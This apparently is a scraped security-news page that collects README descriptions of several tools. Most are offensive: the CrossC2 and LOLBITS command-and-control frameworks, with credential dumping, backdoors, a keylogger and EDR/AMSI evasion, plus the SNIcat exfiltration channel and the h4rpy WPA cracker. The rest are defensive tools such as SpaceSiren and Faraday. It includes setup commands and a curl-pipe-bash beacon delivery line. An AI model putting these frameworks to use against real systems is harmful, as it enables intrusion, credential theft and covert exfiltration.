A security framework for enterprises and Red Team personnel, supports CobaltStrike's penetration testing of other platforms (Linux / MacOS / ...), supports custom modules, and includes some commonly used penetration modules.
Only for internal use by enterprises and organizations, this framework has a certain degree of instability. Non-professionals are not allowed to use it. Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.
Run Env (x86)
Run Env (x64)
gen beacon (x86)
gen beacon (x64)
gen beacon (armv7)
gen beacon (arm64)
gen beacon (mips[el])
Restricted description:
  • CobaltStrike: currently only supports the last version of cs 3.14(bug fixs).
  • Linux: For particularly old systems, you can choose "Linux-GLIBC" option in cna (around 2010)
  • MacOS: Latest systems only support 64-bit programs
  • iOS: sandbox, restricted cmd
  • Embedded: only *nix
  • ⍻ : Loader is still in progress

Install & Usage
  • CrossC2.cna
  • genCrossC2(If it is a Windows system, download genCrossC2.Win.exe)
  1. choose Script Manager,add CrossC2.cna (If successfully installed, the menu bar will have an additional item CrossC2)
  2. Modify the genCC2 path in the CrossC2.cna script to the real path
77:    $genCC2 = "/xxx/xx/xx/genCrossC2.MacOS";  # <-------- fix
Create listener and copy key:
For some reasons, only HTTPS beacon is currently supported.
Copy .cobaltstrike.beacon_keys from the cs directory on the server to the local directory.

Reference documents: Wiki

Module: API introduction Wiki
It adopts the method of loading memory without landing, and supports dynamic libraries (.so/.dylib) and executable files (ELF/MachO). ⚠️: Although the file is loaded directly from memory, the process can be viewed in ps when the executable file is passed in, but the process name can be customized.
The type of output information can be freely specified at the time of execution. The return type has been predetermined and can be docked with the native return data type of CS. ⚠️: For special data types, such as passwords, port scan results, etc., please refer to the information returned by the native function of cs, which will be matched according to the regular.
  1. Password dump module: cc2_mimipenguin uses the open source project MimiPenguin2.0, see CrossC2Kit/ mimipenguin/mimipenguin.cna
  2. Authentication backdoor modules: cc2_auth, cc2_ssh sudo / su / passwd and other authentication backdoors, ssh is connected and the credentials to connect to other hosts will be recorded.
  3. Information collection modules: cc2_safari_dump, cc2_chrome_dump, cc2_iMessage_dump, cc2_keychain_dump access records of common browsers, as well as iMessage chat content and authentication credentials saved in the keychain will be obtained.
  4. Traffic proxy module: cc2_frp supports fast TCP/KCP(UDP) reverse socks5 encrypted traffic proxy.
  5. Keylogger module: cc2_keylogger records user's keyboard input.
  6. Network detection module: cc2_portscan, cc2_serverscan for port scanning and service version scanning.
  7. Privilege promotion module: cc2_prompt_spoof induces deception to obtain user account password.
  8. Task management module: cc2_job manages the modules running in memory.
  9. ...

Custom communication protocol: API introduction Wiki
Can more easily realize C2Profile configuration and custom communication protocol TCP / UDP and so on.

Lateral movement: Usage Wiki
  1. 生成 Linux-bind / MacOS-bind类型的beacon
  2. 内网中的目标运行 ./MacOS-bind.beacon <port>开启服务
  3. 在网络联通的session中运行 connect <targetIP>:<port>

cna plugin way
Menu Bar: CrossC2 -> CrossC2 Payload Generator -> genCrossC2

Can be configured in the pop-up dialog:
1. Select beacon_key (the path cannot contain spaces, the problem is not solved yet)
2. A dynamic library of custom communication protocols that needs to be bound to beacon
3. Payload type (Staged generated shellcode requires stagerServer)

The information status will be prompted in the event interface during generation
05/01 23:31:03 *** /mnt/cc2/genCrossC2.MacOS 5555 /tmp/beacon_keys null MacOS x64 /tmp/CrossC2-test
05/01 23:31:06 *** genCrossC2 beacon -> *[success] : Packed 1532232 byte.
05/01 23:31:07 *** hook hosted CrossC2 beacon MacOS x64 @
05/01 23:31:07 *** hook hosted Script Unix Web Delivery (curl) @
05/01 23:31:07 *** CrossC2 MacOS x64: curl -A o -o- -L | bash -s

Coming soon
  1. Rich C2Profile support ✔︎ (Choose custom HTTP module when CNA generates beaocn)
  2. Staged Type Shellcode Generation ✔︎ (Only Linux is temporarily supported, and stagerServer needs to be started on the server)
  3. http-proxy (auth) & socks proxy back connection support
  4. Proxy-Pivots ✔︎ (Temporarily adopt the method of connecting back to socks proxy)
  5. node beacon? (Single node type, can host other beacon without relying on teamserver)



MacOS & Linux

Develop dynamic libraries and customize data return types, such as implementing some built-in functions.





release v2.0 :
  • -fix Fix the problem of path errors caused by backslashes when uploading files in the file management office
  • -fix Long-term testing in various scenarios in the real environment, fixing some hidden problems, and now more stable
  • +support Support for lower kernel version systems
  • +support Environment variables are automatically set at startup
  • +support Delete sensitive env records at startup
  • +support The background service process can be linked to the init process at startup
  • +support Increase session spawn function
  • +support Increase the function of session setting environment variables
  • +support Increase the privilege escalation function of session getsystem
  • +support Increase session analysis function to handle multiple merge tasks
  • +support Increase Mac & Linux lateral movement function

release v1.5 :
  • -fix genCrossC2's bug about protocol rebinding.

release v1.4 :
  • -fix Linux daemon process and joblist display problem.

release v1.3 :
  • +support Support custom communication protocol (HTTP, TCP, UDP...) .
  • +support A new joblist module has been added to manage programs running without files in persistent memory.
  • +support Reverse proxy module{TCP/KCP(UDP)} that executes without files in memory.
md5(genCrossC2.Linux) = 221b3ede4e78fee80f59946f116d7245
md5(genCrossC2.MacOS) = d216cad3fe3c25ead46b85c7ad7051f1
md5(genCrossC2.Win.exe) = a573506e8825b46b041ac3b9307a656b

release v1.2 :
  • +support Support manual selection of key files.
  • +support Support to generate shellcode.
  • -change No longer rely on cobaltstrike.jar (plug-ins can be placed in any directory).
  • -change More flexible and convenient Script Unix Web Delivery.
md5(genCrossC2.Linux) = 2ef7250cc3787d3cbd1e6f99c3c434aa
md5(genCrossC2.MacOS) = eaabde94dd7fed8dabb37cd67a1171c4
md5(genCrossC2.Win.exe) = c65ac808ed3a1000b3ff4ebb8c48ea4e

release v1.1 :
  • -fix Multi-language garbled problem fix for memory load execution function
md5(genCrossC2.Linux) = 2347ed6e30e4655b793a6dbb4d33d25c
md5(genCrossC2.MacOS) = f530333500a76fe228864f8901af4104
md5(genCrossC2.Win.exe) = c223e31b2674a8a11d3254f92259e87a

release v1.0 :
  • -fix Test multiple times for a long time in multiple scenarios in real environment, fix some hidden problems, now more stable
  • +support Linux & MacOS Supports no file landing, loading and executing from memory
  • +support Reserved CS built-in data types, richer user-defined plug-in return data types, free and easy to implement 'portscan' and other native functions
md5(genCrossC2.Linux) = 12295998d4bffd5b4c4a411fb33428bb
md5(genCrossC2.MacOS) = c88ce9df47529b243e2215a866d445c5
md5(genCrossC2.Win.exe) = 51d1814f1ebbab634bce0373ceb7cee6

release v0.4 :
  • -change Multi-threaded background when shell commands are executed
  • -change Redirect error output to standard output when shell command is executed.
  • +support Add background file download function.
md5(genCrossC2.Linux) = b2e34f721ec2543b6625e33c8c2935df
md5(genCrossC2.MacOS) = 4e38a9d9a3eeff309648afc02e2e7664

release v0.3 :
  • +support Compatibility with older versions of GLIBC on older systems Linux (around 2010).

release v0.2 :
  • -fix genCrossC2.Linux crash.
  • -fix uploading large file error.
  • +support GUI file manager.
md5(genCrossC2.Linux) = 8256374d88c2149efc102aff7e90b3f9
md5(genCrossC2.MacOS) = 08fce0a5d964a091d8bf2344d7ab809e

release v0.1 :
  • Support Linux & MacOS beacon generation.
md5(genCrossC2.Linux) = f4c0cc85c7cdd096d2b7febedc037538
md5(genCrossC2.MacOS) = 79fff0505092fc2055824ed1289ce8f9

Killchain - A Unified Console To Perform The "Kill Chain" Stages Of Attacks


What is “Kill Chain”?
From Wikipedia: The term kill chain was originally used as a military concept related to the structure of an attack; consisting of target identification, force dispatch to target, decision, order to attack the target, and finally the destruction of the target.
  • Reconnaissance– Uses social engineering to find weaknesses in the target’s security posture.
  • Weaponization– Crafting attack tools for the target system.
  • Delivery– Delivering the attack tools to the target system.
  • Exploit– The malicious file intended for an application target system or the operating system vulnerabilities control objectives is opened by the victim on target system.
  • Installation– Remote control program installed on target system.
  • Command & Control– Successfully compromised hosts will create a C2 channel on the Internet to establish a connection with the C2 server.
  • Actions– After the preceding process, the attacker will continue to steal information about the target system, undermine the integrity and availability of information, and further to control the machine to jump to attack other machines, to expand the sphere of influence.

Dependent tool sets are:
  1. Tor -- For the console build-in anonymizer.
  2. Set -- Social-Engineer Toolkit (SET), attacks against humans.
  3. OpenVas -- Vulnerability scanning and vulnerability management.
  4. Veil-Evasion -- Generate metasploit payloads bypass anti-virus.
  5. Websploit -- WebSploit Advanced MITM Framework.
  6. Metasploit -- Executing exploit code against target.
  7. WiFite -- Automated wireless auditor, designed for Linux.

killchain Setup

killchain Add-on

LOLBITS v2.0.0 - C2 Framework That Uses Background Intelligent Transfer Service (BITS) As Communication Protocol And Direct Syscalls + Dinvoke For EDR User-Mode Hooking Evasion


LOLBITS is a C2 framework that uses Microsoft's Background Intelligent Transfer Service (BITS) to establish the communication channel between the compromised host and the backend. The C2 backend is hidden behind an apparently harmless flask web application and it's only accesible when the HTTP requests received by the app contain a valid authentication header. Since this tool is meant to be used in highly monitored environments, the following features have implemented in order to avoid EDR and AV detection:
  • ETW and AMSI patching.
  • Use of direct syscalls to avoid EDR usermode API hooking.
  • Manual mapping of kernel32.dll and advapi32.dll in combination with DInvoke.
  • Basic Sandbox detection before establishing the communication channel with the C2 backend.
  • Use of BITS in background mode to generate the communication channel without disturbing the user experience.
Regarding the architecture, LOLBITS is composed of 3 main elements:
  • The C# agent that is in charge of executing the commands in the compromised host, sending back the output to the C2 server once the task is completed.
  • The flask web application that acts as a dispatcher. This element is the one that allows to hide the C2 infrastructure behind a harmless website at the same time that supplies the new commands to the agent when an authenticated request is received.
  • The C2 console, used to control the agent.
In order to deny proxies content inspection, all the relevant content sent between the agent and the C2 server is encrypted using RC4 with a preshared secret key randomly generated. A high level diagram of the infrastructure behaviour would be as it's shown in the following image:

To avoid that the Blue Team could reproduce some of the old requests and discover the C2 backend infrastructure, each authentication header is randomly generated and is valid only for one single cycle (a cycle is composed of a POST request followed by a GET request, in that order). Old authentication headers will be ignored and the harmless website will be displayed for those requests.

Some of this tool features have being implemented either reusing code from other projects or thanks to the effort of several cybersecurity researchers. Here below I link some of the external work and projects that have been used in one way or another to improve this tool:

Getting Started

For the C2 infrastructure is required a Windows Server 2016 or above with python 3.4+ and powershell 5.1+. The C# agent has been successfully tested on Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows 7, Windows 8.1 and Windows 10. To compile it it's required:
  • Visual Studio 2017 or above.
  • .NET Framework 4.5 or above.

1.- Clone this repository on your C2 server
git clone https://github.com/Kudaes/LOLBITS.git
2.- Install Web Server (IIS) through Windows Server Manager. Make sure to install CGI, ASP.NET and .NET Extensibility roles.

Also install .NET Framework and BITS features for IIS.

3.- Execute the setup.ps1 script as administrator to deploy the whole infrastructure and set up the C# agent.
4.- Compile the C# agent. The compilation will generate an .exe and an external dependency (Newtonsoft.Json.dll). You can generate a single .exe using ILMerge or just send both files to the compromised host. To avoid DEBUG output, make sure to compile the project as a Windows Application.

5.- (Optional) By default. the setup.ps1 script will create a new Web Site in your IIS called lawlbits listening in the default HTTP port (80/TCP). This new Web Site doesn't use HTTP over TLS and, even though the content of the requests sent by the C# agent to the C2 are encrypted using RC4 with a preshared and randomly generated secret key, it is recommended to set up the use of HTTPS for the new site. In order to do that, I recommend to use Let's Encrypt over lawlbits, which is one of the easiest ways to set up HTTPS. After that, remember to modify the variable Url on Program.cs to use HTTPS instead of HTTP, which is the default behaviour.

To obtain the reverse shell just type in python lawlbin.py on a cmd of the C2 server and execute the C# agent on the compromised host.
Since this project borns from the ashes of a previous and failed project, some of the old features have been kept. The old project was a shell where all the available commands would be executed using exclusively Living of The Land Binaries. That's where the LOL of LOLBITS comes from, and that's why the following features run using exclusively LOLBINS (this could help to bypass AWS and some AV/EDR filters):
  • download: Download a file from a remote Webdav to the compromised host.
  • base64encode: Use base64 to encode a local file content.
  • base64decode: Decode a base64 encoded file.
  • compile: Compile .cs files into .exe or .dll.
Despite this features could be interesting in some environments (hmm download remote files without using Powershell? I like it!) I kept them just to reuse part of the old code for the C2 console. Below is a list with some other features that im sure will be more usefull in a classic red team context:
  • inject: Download from the C2 a shellcode (.bin) or PE (.NET assembly) file and execute it in memory. With this command the payload never touches disk unencrypted, avoiding AV detection. .NET assemblies can only be loaded in the same calling process, while shellcode are allowed to be injected in both own and other processes (only x64 processes).
  • psh: Generate a Powershell reverse shell. This shell has to be handled by additional software like netcat (just run nc -lvp ).
  • send: To send a file from your C2 to the compromised host just use this option. The sent file will be store unencrypted on disk.
  • getsystem: Attempt to obtain System privileges. High integrity level required.
  • impersonate: Attempt to steal an access token from other process in order to "become" another user.
  • runas: Use valid credentials to modify your security context and log in as other (local or domain) user.
  • rev2self: Remove security context changes performed by getsystem, impersonate or runas.
  • exfiltrate: Send a file from the compromised host to your C2.
To get usage tips just type in help or <somecommand> help.

My Twitter
My Linkedin

SpaceSiren - A Honey Token Manager And Alert System For AWS


SpaceSiren is a honey token manager and alert system for AWS. With this fully serverless application, you can create and manage honey tokens at scale -- up to 10,000 per SpaceSiren instance -- at close to no cost.1

How It Works
  • SpaceSiren provides an API to create no-permission AWS IAM users and access keys for those users.
  • You sprinkle the access keys wherever you like, for example in proprietary code or private data stores.
  • If one of those sources gets breached, an attacker is likely to use the stolen key to see what they can do with it.
  • You will receive an alert that someone attempted to use the key.

Alert Outputs
  • Email
  • PagerDuty
  • Slack
  • Pushover

Documentation Pages

As with any open source project, this one assumes you have the required foundational tools and knowledge, mainly in AWS and Terraform.

  • Terraform >= 0.13
  • A dedicated AWS account with admin access
  • A registered domain

  • Basic Terraform
  • Basic REST API
  • Basic AWS CLI, S3, and Route 53
  • Basic AWS Organizations and IAM Roles for cross-account access
  • Intermediate DNS (delegating a (sub)domain with NS records)

If you notice a critical security bug (e.g., one that would grant real access to an AWS account), please responsibly disclose it via email at contact@spacesiren.io.
For standard bugs or feature requests, please open a GitHub issue.

Special thanks to:
  • Atlassian for Project SpaceCrab, the inspiration for this project. If you want to read about why I started SpaceSiren, please see my SpaceCrab critique page.
  • The wonderful and talented Alia Mancisidor for the artwork.
  • Anyone who volunteered to test this application for me.

  1. While SpaceSiren was designed to run as cheaply as possible, even for individuals, it will not be entirely free of operating costs. You will incur nominal costs for DynamoDB, Lambda, API Gateway, Route 53, and perhaps CloudTrail, depending on your configuration. You should expect to spend between $1 and $5 per month to run SpaceSiren. Of course, the project's maintainers are not responsible for any actual costs you incur. Please closely monitor your AWS bill while it is in use.

Bbrecon - Python Library And CLI For The Bug Bounty Recon API


Bug Bounty Recon (bbrecon) is a free Recon-as-a-Service for bug bounty hunters and security researchers. The API aims to provide a continuously up-to-date map of the Internet "safe harbor" attack surface, excluding out-of-scope targets.
It comes with an ergonomic CLI and Python library.
This repository holds the CLI and Python library. Please see the website for more details.

Important Notice
While effort is taken to ensure the results returned by bbrecon are reliable and trustworthy, this service and its operators are in no way responsible for what you do with the data provided.
Double check your scopes and ensure you stay within safe harbors.

  • Public Programs - public bug bounty programs indexed and searchable with filters (live)
  • Domains - domains in scope across programs (live)
  • Private Programs - support for private programs (September 2020)
  • Notifications - webhook alerts when programs are created, updated or domains discovered (September 2020)
  • Endpoints - all HTTP and non-HTTP endpoints in scope across all programs (October 2020)

bbrecon is in a gradual Beta release phase; major features are released every few weeks to get feedback and fix kinks. You can sign up and start using it, but be aware that breaking changes may be deployed without notice. While the service and infrastructure is designed to scale, it is not currently configured to serve a large global audience. This will change, but for now YMMV.

Please report bugs with GitHub issues.
Use the Gitter chat for support or enquiring about service availability during beta.

Getting Started

API key
Fetch an API key from the Console: https://console.bugbountyrecon.com
Only Google SSO is supported at this time.

$ pip3 install bbrecon
bbrecon requires Python >= 3.8 - if pip tells you it can't find bbrecon it's probably because pip is using another Python version. Check this with pip3 --version.
If you intend to use the CLI, you should permanently configure your key:
$ bbrecon configure key
Enter your API key: YOUR_API_KEY
You can alternatively set the BBRECON_KEY environment variable if you prefer.

The following will output all programs released in the last month that have "web" type targets (APIs/web apps):
$ bbrecon get programs --type web --since last-month
cybrary bugcrowd 2020-07-22 fame $0 $0 $0 6 android,ios,web
expressvpn bugcrowd 2020-07-14 cash,fame $150 $1047 $2500 17 android,ios,other,web
prestashop yeswehack 2020-07-23 cash $0 $0 $1000 1 web
To get scopes for specific programs, use get scopes:
$ bbrecon get scopes rockset codefi-bbp
rockset hackerone web console.rockset.com
rockset hackerone web docs.rockset.com
rockset hackerone web api.rs2.usw2.rockset.com
codefi-bbp hackerone web activate.codefi.network
To get domains for specific programs, use get domains:
$ bbrecon get domains dropcontact rebellion-defense
dropcontact www.dropcontact.io 2020-08-23
rebellion-defense mooch.rip 2020-08-23
rebellion-defense www.rebelliondefense.com 2020-08-23
rebellion-defense rebelliondefense.com 2020-08-23
Most commands can output JSON to make it easy to work with your scripts. Try --output json:
$ bbrecon get programs --output json
"url": "https://bugcrowd.com/optimizely",
"name": "Optimizely",
"platform": "bugcrowd",
"rewards": [
You can get information about specific programs by passing one or many slugs to the get programs command:
$ bbrecon get programs twago optimizely
twago intigriti 2020-04-09 $0 $0 $0 5 web
optimizely bugcrowd 2018-03-22 cash,fame $0 $750 $5000 6 web
Use --help to get a list of filters for each command:
$ bbrecon get programs --help
Output format. [default: wide]
-n, --name TEXT Filter by name.
-t, --type TEXT Filter by scope type. Can be used multiple

-r, --reward TEXT Filter by reward type. Can be used multiple

-p, --platform TEXT Filter by platform. Can be used multiple

--exclude-platform TEXT Exclude specific platform. Ignored if
--platform was passed. Can be used multiple

-s, --since TEXT Filter by bounties created after a certain
date. A specific date in the format
'%Y-%m-%d' can be supplied. Alte rnatively,
the following keywords are supported:
'yesterday', 'last-week', 'last-month',
'last-year' as well as 'last-X-days' (where
'X' is an integer).
Note that some filters are lists, and can be used multiple times! If you wanted to get all programs that have mobile apps in scope you could run:
$ bbrecon get programs --type android --type ios
square bugcrowd 2018-03-22 cash,fame $300 $492 $5000 4 android,ios,other,web
gojek bugcrowd 2018-03-22 cash,fame $200 $618 $5000 4 android,ios,web
smartthings bugcrowd 2018-03-22 fame $0 $0 $0 5 android,hardware,ios,web

You are invited to check out this repo's codebase for more details, but to get started:
from bbrecon import BugBountyRecon

bb = BugBountyRecon(token=API_TOKEN)

programs = bb.programs(
types=["web", "ios"],

for program in programs:
print(f"{program.name} rewards up to ${program.maximum_bounty}!")
print(f"More information is available at: {program.url}")

for scope in program.in_scope:
if scope.type == "desktop":
print("Found a desktop app in scope for this program. Cool!")

You can interact directly with the REST API if you prefer. Check out the API docs here.

Geo-Recon - An OSINT CLI Tool Desgined To Fast Track IP Reputation And Geo-locaton Look Up For Security Analysts


An OSINT CLI tool desgined to fast track IP Reputation and Geo-locaton look up for Security Analysts.

This tool is compactible with:
  • Any Linux Operating System (Debian, Ubuntu, CentOS)
  • Termux

Linux Setup
git clone https://github.com/radioactivetobi/geo-recon.git
cd geo-recon
chmod +x geo-recon.py
pip install -r requirements.txt

Termux Setup
git clone https://github.com/radioactivetobi/geo-recon.git
cd geo-recon
chmod +x geo-recon.py
pip install -r requirements.txt

Sample Syntax Linux
root@kali:~/geo-recon# python geo-recon.py

░██████╗░███████╗░█████╗░  ██████╗░███████╗░█████╗░░█████╗░███╗░░██╗
██╔════╝░██╔════╝██╔══██╗  ██╔══██╗██╔════╝██╔══██╗██╔══██╗████╗░██║
██║░░██╗░█████╗░░██║░░██║  ██████╔╝█████╗░░██║░░╚═╝██║░░██║██╔██╗██║
██║░░╚██╗██╔══╝░░██║░░██║  ██╔══██╗██╔══╝░░██║░░██╗██║░░██║██║╚████║
╚██████╔╝███████╗╚█████╔╝  ██║░░██║███████╗╚█████╔╝╚█████╔╝██║░╚███║
░╚═════╝░╚══════╝░╚════╝░  ╚═╝░░╚═╝╚══════╝░╚════╝░░╚════╝░╚═╝░░╚══╝

By d3xt3r_182
Github: https://github.com/radioactivetobi | Twitter: @d3xt3r_182
Usage: python geo-recon.py <IPADDRESS>

[*] Running Geo-location Check Against

Country: Brazil
Region: Piaui
City: Teresina
Organization: Itech Telecom
ISP: Itech Telecom

[*] Geo-IP Lookup Complete!!!

[*] Running Reputation Check Against

Domain: "redeitechtelecom.com.br"
Hostname: []
Usage Type: "Fixed Line ISP"
Confidence of Abuse: 100
Number Times of Reported: 982
Last Reported: "2020-08-21T16:43:12+00:00"
Whitelisted: false

The IP Address Is Malicious and well known for SSH Bruteforce Attacks

[*] IP Reputation Look up Complete!!!

Sample Syntax Termux
$ python2 geo-recon.py

░██████╗░███████╗░█████╗░  ██████╗░███████╗░█████╗░░█████╗░███╗░░██╗
██╔════╝░██╔════╝██╔══██╗  ██╔══██╗██╔════╝██╔══██╗██╔══██╗████╗░██║
██║░░██╗░█████╗░░██║░░██║  ██████╔╝█████╗░░██║░░╚═╝██║░░██║██╔██╗██║
██║░░╚██╗██╔══╝░░██║░░██║  ██╔══██╗██╔══╝░░██║░░██╗██║░░██║██║╚████║
╚██████╔╝███████╗╚█████╔╝  ██║░░██║███████╗╚█████╔╝╚█████╔╝██║░╚███║
░╚═════╝░╚══════╝░╚════╝░  ╚═╝░░╚═╝╚══════╝░╚════╝░░╚════╝░╚═╝░░╚══╝

By d3xt3r_182
Github: https://github.com/radioactivetobi | Twitter: @d3xt3r_182
Usage: python geo-recon.py <IPADDRESS>

[*] Running Geo-location Check Against

Country: Brazil
Region: Piaui
City: Teresina
Organization: Itech Telecom
ISP: Itech Telecom

[*] Geo-IP Lookup Complete!!!

[*] Running Reputation Check Against

Domain: "redeitechtelecom.com.br"
Hostname: []
Usage Type: "Fixed Line ISP"
Confidence of Abuse: 100
Number Times of Reported: 982
Last Reported: "2020-08-21T16:43:12+00:00"
Whitelisted: false

The IP Address Is Malicious and well known for SSH Bruteforce Attacks

[*] IP Reputation Look up Complete!!!

To Do List

SNIcat - Server Name Indication Concatenator


SNIcat is a proof of concept tool that performs data exfiltration, utilizing a covert channel method via. Server Name Indication, a TLS Client Hello Extension. The tool consists of an agent which resides on the compromised internal host, and a Command&Control Server which controls the agent and gathers exfiltrated data.
The full story behind SNIcat can be found in our blog post

SNIcat has been tested on macOS and a variety of linux distributions. Even though it can be easily ported, there is currently no Windows version, as this is just a PoC tool.
The exfiltration method does not work with explicit proxies, due to the use of HTTP CONNECT, and not TLS Client Hello, when connecting via an explicit proxy.
SNIcat might not work with products and software versions that we haven’t tested, but that does not mean the products and/or software versions aren’t vulnerable.

SNIcat in action

Background and Scenario
We discovered a new stealthy method of data exfiltration that specifically bypasses security perimeter solutions such as web proxies, next generation firewalls (NGFW), and dedicated solutions for TLS interception and inspection. Our testing validates that this is a widespread issue that affects different types of security solutions as well as solutions from a variety of vendors. We successfully tested our technique against products from F5 Networks, Palo Alto Networks and Fortinet, and speculate that many other vendors also are susceptible.
By using our exfiltration method SNIcat, we found that we can bypass a security perimeter solution performing TLS inspection, even when the Command & Control (C2) domain we use is blocked by common reputation and threat prevention features built into the security solutions themselves. In short, we found that solutions designed to protect users, introduced them to a new vulnerability.
We have also provided a Suricata signature for detecting this specific tool.

Clone the repository:
Install dependencies:
pip3 install -r requirements.txt --user

Initial setup
Aquire a wildcard certificate and key from a publically trusted CA. This represents the GOOD_CERT and GOOD_CERT_KEY.
Utilise a self-signed certificate and key (not in any trust store) as a BAD_CERT and BAD_CERT_KEY.
(*) USAGE:      'python3 snicat_c2.py <LISTENING_PORT> <GOOD_CERT> <GOOD_CERT_KEY> <BAD_CERT> <BAD_CERT_KEY> log={on|off}'
(*) EXAMPLE: 'python3 snicat_c2_final.py 443 certs/good.pem certs/good.key certs/ssl-cert-snakeoil.pem log=off'
(*) USAGE:      'python3 snicat_agent.py <C2_SERVER_IP> <C2_SERVER_PORT> log={on|off}'
(*) Example: 'python3 snicat_agent.py 443 log=off'

C2 Available commands
LIST    -  display all content in current folder
LS - display only files in the currenet folder
SIZE - display size of files in the currenet folder
LD - display every directory in current folder
CB - moves down to root tree folder - similar to 'cd .. '
CD <folder-id> - moves up the specified folder
EX <file-id> - exfiltrate the specified file
ALIVE - check alive/dead agent
EXIT - quit the C2 server

H4Rpy - Automated WPA/WPA2 PSK Attack Tool


h4rpy is an automated WPA/WPA2 PSK attack tool, wrapper of aircrack-ng framework.
h4rpy provides clean interface for automated cracking of WPA/WPA2 PSK networks. h4rpy enables monitor mode on selected wireless interface, scans the wireless space for access points, tries to capture WPA/WPA2 4-way handshake for the acess point, and starts a dictionary attack on the handshake. It is also possible to send disassociate packets to clients associated with access point.

Installation consists of cloning the repo, running a script that will install dependencies (aircrack-ng framework and Terminator are required in order to run h4rpy), and making h4rpy executable. Script only works with apt package manager (Debian based distributions).
# git clone https://github.com/MS-WEB-BN/h4rpy/
# cd h4rpy
# sudo bash config.sh
# sudo chmod +x h4rpy

To run h4rpy:
# sudo ./h4rpy
Top-left: Enabling monitor mode, scanning for access points (packet capturing of raw 802.11 frames);
Top-right: Packet capturing on selected wireless network, capturing the WPA/WPA2 4-way handshake;
Bottom-left: Sends disassocate packets to clients which are currently associated with a selected access point;
Bottom-right: Dictionary attack on the captured WPA/WPA2 4-way handshake.


Any actions and/or activities done by using h4rpy are solely your responsibility. The misuse of h4rpy can result in criminal charges brought against the persons in question. The author will not be held responsible in the event any criminal charges be brought against any individuals misusing h4rpy to break the law.

Faraday v3.12 - Collaborative Penetration Test and Vulnerability Management Platform


 There are better ways than managing vulnerabilities with spreadsheets, especially when you are working with several tools. We know it’s easy to lose trail of your efforts. In faraday you can keep track of your scanners and your team in one place,

This update is focused on improving your everyday tasks in managing information. The Jira and ServiceNow integrations now support custom templates, allowing the easy creation of issues in those platforms with only one click.

We keep adding features to our agents, allowing the reuse of them in multiple workspaces, so for example, you can share a scanner with multiple projects at the same time.

And last but not least, we are also releasing a brand new tool for managing data from Faraday in your terminal, faraday- cli.

Reuse your agents!

Ever since we launched Agents, Faraday has improved automatization with external tools. In order to continue improving this feature, we have added the possibility to run your agents in several workspaces at the same time, allowing you to get the most out of it.

Currently we support automation of 11 tools, including Arachni, Burp, Nessus, w3af so you can schedule your scans directly on faraday.

Customization on ticketing tools integration

One of the main goals of Faraday is to integrate the security operations to the rest of the company by integrating popular issue trackers such as Jiras and Service Now. You can now export vulnerability information directly to such ticketing tools.

With this new version, you can finally customize what information is sent to those platforms. Thanks to the new template feature you can send the required information with just one click.

New plugins, new inputs

On this release, we continue integrating your favorite tools, many of which can be used to build DevSecOp pipelines. Faraday currently has more than 70+ plugins and we are happy to add the following ones:
  •     RDP scan
  •     HCL APPScan
  •     SSL labs

Want to see more? Check out this repo: https://github.com/infobyte/faraday_plugins

Work directly from your terminal

We know that many of you are command line lovers, we are too! We wanted a better way of interacting with Faraday directly from our terminal. This new helper allows any Faraday user to:
  •     Manage workspaces
  •     Get information of hosts
  •     Create vulnerabilities directly from commands and reports
  •     Run your agents

Faraday-cli in action:

First you need to install faraday-cli, you can do that directly from pip:
pip3 install faraday-cli

The first step is to authenticate, if you don’t have a Faraday server you can try our demo instance: https://demo101.faradaysec.com (faraday/demo101)
faraday-cli auth

Now you only need to select an available workspace, remember if you are using demo101 that is a public server:
faraday-cli workspace -n demo_workspace -a select

Once you have configured faraday-cli you can use the rest of the features.
In this example we are going to use rdpscan (https://github.com/robertdavidgraham/rdpscan) and keep track of the results in Faraday:
faraday-cli command "./rdpscan–"

If you want to see more examples head to our github repo: https://github.com/infobyte/faraday-cli

For any requests/questions, please contact us at sales@faradaysec.com and we’ll be happy to assist you on what you need.

There is a better way to work and manage your vulnerabilities, start now : https://faradaysec.com/faraday-landing/

Faraday Crew

Wordlist_Generator - Unique Wordlist Generator Of Unique Wordlists


wordlist_generator generates wordlists with unique words with techniques mentioned in tomnomnom's report "Who, What, Where, When". It takes URLs from gau and splits them to get words in URLs. Then it requests each URL to fetch all words. Finally, wordlist_generator removes from wordlist everything from "denylists" directory files to keep only unique words, which you can use for domain, directory, parameter, vhosts, etc bruteforcing.

$ ./wordlist_generator.py -d hackerone.com -a 5000 -t 50
$ ./wordlist_generator.py -d bugcrowd.com -a 1000
$ ./wordlist_generator.py -d intigriti.com > intigriti_wordlist.txt
To display the help for the tool use the -h flag:
./wordlist_generator.py -h
-domaintarget domain./wordlist_generator.py -d openbugbounty.org
-threadsthreads amount./wordlist_generator.py -d yahoo.com -t 6
-amountamount of URLs to fetch from gau/wordlist_generator.py -d twitter.com -a 10000

$ git clone https://github.com/SomeKirill/wordlist_generator/
$ cd wordlist_generator
$ pip install requests

denylists wordlists used:

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